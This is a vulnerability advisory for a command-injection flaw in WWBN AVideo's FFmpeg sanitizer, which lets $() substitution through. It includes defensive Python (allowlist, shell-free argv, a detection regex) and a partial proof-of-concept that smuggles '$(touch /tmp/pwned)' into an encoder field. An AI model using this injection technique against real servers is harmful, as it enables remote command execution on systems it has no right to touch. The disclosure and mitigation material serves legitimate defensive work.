Security Vulnerability Report
CVE-2026-33482 CVSS 8.1 HIGH

Published: 2026-03-23 15:16:35
Last Modified: 2026-03-24 18:41:00

Description

WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `sanitizeFFmpegCommand()` function in `plugin/API/standAlone/functions.php` is designed to prevent OS command injection in ffmpeg commands by stripping dangerous shell metacharacters (`&&`, `;`, `|`, `` ` ``, `<`, `>`). However, it fails to strip `$()` (bash command substitution syntax). Since the sanitized command is executed inside a double-quoted `sh -c` context in `execAsync()`, an attacker who can craft a valid encrypted payload can achieve arbitrary command execution on the standalone encoder server. Commit 25c8ab90269e3a01fb4cf205b40a373487f022e1 contains a patch.
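The Python below is an added example, not AVideo's code: the denylist function is a constructed stand-in for the behaviour the description attributes to `sanitizeFFmpegCommand()`, used to show why stripping metacharacters leaves `$()` intact, and the two defender-side fixes a reviewer would ask for: an allowlist that rejects instead of strips, and building an argv list that never passes through `sh -c`. The `printf` call at the end assumes a POSIX system with coreutils.

```python
import re
import shlex
import subprocess

# Constructed stand-in for the denylist behaviour the advisory describes:
# strip "&&", ";", "|", "`", "<", ">" and pass the remainder to a shell.
# This is an assumption for illustration, not AVideo's real function.
DENYLIST = ["&&", ";", "|", "`", "<", ">"]

def denylist_sanitize(cmd: str) -> str:
    """Vulnerable pattern: removes known-bad tokens, leaves "$(" untouched."""
    for token in DENYLIST:
        cmd = cmd.replace(token, "")
    return cmd

# Fix 1: allowlist and reject. Only characters a path or ffmpeg option
# legitimately needs are accepted; anything else is an error, not a strip.
SAFE_ARG = re.compile(r"[A-Za-z0-9._/:=+,@-]+")

def validate_arg(arg: str) -> bool:
    return SAFE_ARG.fullmatch(arg) is not None

# Fix 2: build an argv list and execute without a shell, so "$(" is just
# bytes handed to ffmpeg. shlex.quote is the fallback if a shell string is
# truly unavoidable (e.g. an existing `sh -c` wrapper).
def build_ffmpeg_argv(input_path: str, output_path: str) -> list:
    for arg in (input_path, output_path):
        if not validate_arg(arg):
            raise ValueError(f"rejected argument: {arg!r}")
    return ["ffmpeg", "-y", "-i", input_path, output_path]

def build_shell_line(argv: list) -> str:
    return " ".join(shlex.quote(a) for a in argv)

def echo_without_shell(arg: str) -> str:
    """Hands arg to printf as argv (no shell); returns what the child saw."""
    out = subprocess.run(["printf", "%s", arg], capture_output=True, text=True)
    return out.stdout

# Detection: flag request fields carrying substitution syntax for review.
SUBSTITUTION = re.compile(r"\$\(|\$\{|`")

def looks_like_substitution(field: str) -> bool:
    return SUBSTITUTION.search(field) is not None
```

Run the denylist over a field containing `$(...)` and the token survives; the allowlist rejects the same field, and the argv path shows the child process receives it as a literal string.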

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo <= 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Concept for CVE-2026-33482
# This demonstrates how to bypass the sanitizeFFmpegCommand filter.
# The application strips characters like ; | && but misses $().
import requests

target_url = "http://target-site/plugin/API/standAlone.php"

# The payload injects a command using $() syntax.
# Example: Creating a file named 'pwned' to prove execution.
# Note: The actual parameter name and encryption method depend on the app config.
malicious_cmd = "$(touch /tmp/pwned)"

# Assume 'videoUrl' or similar parameter is passed to ffmpeg
# The payload would be: "normal_input $(touch /tmp/pwned)"
payload = f"input.mp4 {malicious_cmd}"

# In a real exploit, this payload would need to be encrypted
# as expected by the AVideo standalone encoder API.
data = {
    "encryptedPayload": "<encrypted_representation_of_payload>"
}

# response = requests.post(target_url, data=data)
# print("Check /tmp/pwned on the server to verify RCE")

References

Patch commit: https://github.com/WWBN/AVideo/commit/25c8ab90269e3a01fb4cf205b40a373487f022e1
Vendor advisory (Exploit, Mitigation): https://github.com/WWBN/AVideo/security/advisories/GHSA-pmj8-r2j7-xg6c
Weakness: CWE-78 (OS Command Injection)
